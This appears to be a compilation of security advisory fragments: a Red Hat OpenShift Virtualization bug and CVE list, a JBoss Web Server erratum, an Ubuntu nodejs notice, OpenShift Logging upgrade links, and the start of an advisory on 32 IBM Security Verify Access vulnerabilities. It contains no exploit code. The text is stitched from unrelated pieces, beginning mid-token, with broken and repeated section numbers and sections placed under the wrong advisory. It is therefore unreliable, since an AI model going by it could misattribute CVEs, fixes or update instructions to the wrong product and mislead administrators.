container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does 
not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which 
are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - 
Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import 
\"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable 
to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create 
MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. 
\n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not 
working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The 
base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. 
This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.

The References section of this erratum contains a download link for the update. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.

Security Fix(es):

* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
* libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
* expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)
* zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
* curl: HSTS bypass via IDN (CVE-2022-42916)
* curl: HTTP proxy double-free (CVE-2022-42915)
* curl: POST following PUT confusion (CVE-2022-32221)
* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
* curl: control code in cookie denial of service (CVE-2022-35252)
* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
* curl: Unpreserved file permissions (CVE-2022-32207)
* curl: various flaws (CVE-2022-32206, CVE-2022-32208)
* openssl: the c_rehash script allows command injection (CVE-2022-2068)
* openssl: c_rehash script allows command injection (CVE-2022-1292)
* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bugs fixed (https://bugzilla.redhat.com/):

2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds
2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody
2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection
2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling
2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read
2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()
2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()
2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability
2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism
2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection
2099300 - CVE-2022-32206 curl: HTTP compression denial of service
2099305 - CVE-2022-32207 curl: Unpreserved file permissions
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification
2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field
2120718 - CVE-2022-35252 curl: control code in cookie denial of service
2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c
2135411 - CVE-2022-32221 curl: POST following PUT confusion
2135413 - CVE-2022-42915 curl: HTTP proxy double-free
2135416 - CVE-2022-42916 curl: HSTS bypass via IDN
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE
2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles

5.
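CVE-2022-37434 in the fix list above lives in zlib's handling of the optional FEXTRA field of the gzip header. As a sketch of the data layout involved (not a reproduction of the bug), the following builds a gzip member carrying an oversized extra field; the helper name `gzip_with_extra` is my own, and Python's stdlib is used only because it is convenient to verify with.

```python
import struct
import zlib

def gzip_with_extra(payload: bytes, extra: bytes) -> bytes:
    """Build a minimal gzip member whose header carries an FEXTRA field.

    CVE-2022-37434 was a heap over-read while zlib's inflate() parsed this
    optional extra field; this sketch only shows the wire format, it does
    not reproduce the bug.
    """
    # Fixed 10-byte header: magic 1f 8b, CM=8 (deflate), FLG with FEXTRA
    # (0x04) set, MTIME=0, XFL=0, OS=255 (unknown).
    header = struct.pack("<2sBBIBB", b"\x1f\x8b", 8, 0x04, 0, 0, 255)
    # XLEN (little-endian uint16) followed by the extra field itself.
    header += struct.pack("<H", len(extra)) + extra
    # zlib.compress() emits a zlib stream; strip its 2-byte header and
    # 4-byte Adler-32 trailer to obtain the raw deflate data gzip expects.
    raw_deflate = zlib.compress(payload)[2:-4]
    # gzip trailer: CRC-32 and uncompressed size, both little-endian uint32.
    trailer = struct.pack("<II", zlib.crc32(payload), len(payload) & 0xFFFFFFFF)
    return header + raw_deflate + trailer

blob = gzip_with_extra(b"hello", b"X" * 4096)  # unusually large extra field
```

A patched decompressor simply skips the field, so `gzip.decompress(blob)` round-trips to `b"hello"`; on affected zlib builds the over-read was reportedly triggered only when the application requested header data via `inflateGetHeader()`.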
==========================================================================
Ubuntu Security Notice USN-6457-1
October 30, 2023

nodejs vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Node.js.

Software Description:
- nodejs: An open-source, cross-platform JavaScript runtime environment.

Details:

Tavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. (CVE-2022-0778)

Elison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)

Chancen and Daniel Fiala discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2068)

Alex Chernyakhovsky discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2097)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS:
  libnode-dev 12.22.9~dfsg-1ubuntu3.1
  libnode72 12.22.9~dfsg-1ubuntu3.1
  nodejs 12.22.9~dfsg-1ubuntu3.1
  nodejs-doc 12.22.9~dfsg-1ubuntu3.1

In general, a standard system update will make all the necessary changes.

Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

4.
Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3293 - log-file-metric-exporter container has no limits, exhausting the resources of the node

6. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: 32 vulnerabilities in IBM Security Verify Access
Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt
Blog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Date published: 2024-11-01
Vendors contacted: IBM
Release mode: Released
CVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142

## Product description

> IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
> In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities.
>
> IBM Security Verify Access offers the following features:
>
> - Authentication
>
> Provides a wide range of built-in authenticators and supports external authenticators.
> - Authorization
>
> Provides permit and deny decisions for protected resource requests in the secure domain through the authorization API.
>
> - Data security and centralized resource management
>
> Manages secure access to private internal network-based resources by using the public Internet's broad connectivity and ease of use with a corporate firewall system.
>
> From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access

## Vulnerability Summary

Vulnerable versions: IBM Security Verify Access < 10.0.8.

The summary of the vulnerabilities is as follows:

1. non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime
2. CVE-2024-25027 - Reuse of snapshot private keys
3. CVE-2023-30997 - Local Privilege Escalation using OpenLDAP
4. CVE-2023-30998 - Local Privilege Escalation using rpm
5. CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalations in IBM code
5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot
5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections
5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot
5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell
6. CVE-2023-43017 - PermitRootLogin set to yes
8. CVE-2024-35137 and CVE-2024-35139 - Lack of password for the `cluster` user
9. CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes
10. CVE-2023-38369 - Hardcoded PKCS#12 files
11. CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key)
12. non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)
13. CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
14. CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
15. CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
16. CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime
17. CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances
18. CVE-2023-32327 - XML External Entity (XXE) in dscd
19. CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
20. non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
21. CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration
22. CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)
23. non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
24. CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime
25. CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp
26. non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)
27. non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
28. non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
29. non-assigned CVE vulnerability - Outdated "IBM Crypto for C" library
30. non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities
30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability
30.2. libtivsec_yamlcpp.so - 4 CVEs
30.3. libtivsec_xml4c.so - outdated Xerces-C library
31. non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images
32. non-assigned CVE vulnerability - Lack of privilege separation in Docker instances

TL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). IBM Security Verify Access is an SSO solution mainly used by banks, Fortune 500 companies and governmental entities.

_Miscellaneous notes_:

The vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They were ultimately patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in an SSO solution does not appear to be on par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE).

The vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear whether all the non-assigned CVE vulnerabilities have been patched, but IBM confirmed that all the vulnerabilities were patched and then closed all the corresponding tickets.

Other issues had been reported but were ultimately dismissed (e.g. hard-to-trigger crashes; I did not have any time left for this security assessment).

Communication with IBM was difficult, since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches.
The timeline toward the end of this advisory provides an overview of my interactions with IBM. IBM PSIRT redirected queries to IBM support, and IBM support provided extremely disappointing answers to the reported vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT rejected them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM about missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing, even though all the tickets had already been closed by IBM in June 2024 and I had previously received confirmation that all the vulnerabilities had been patched.

Security bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew), and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported.

It appears that some CVEs are still missing.

Finally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371, not present in this advisory) was assigned by IBM but refers to an issue (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_ in the report sent to IBM) that was confirmed **not** to be a vulnerability by IBM, and by me after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled to IBM that it was incorrect.

_Impacts_

An attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). Regarding the threat model, it is worth noting that attackers must be able to MITM traffic or gain access inside the LAN of the targeted organizations to exploit these vulnerabilities.
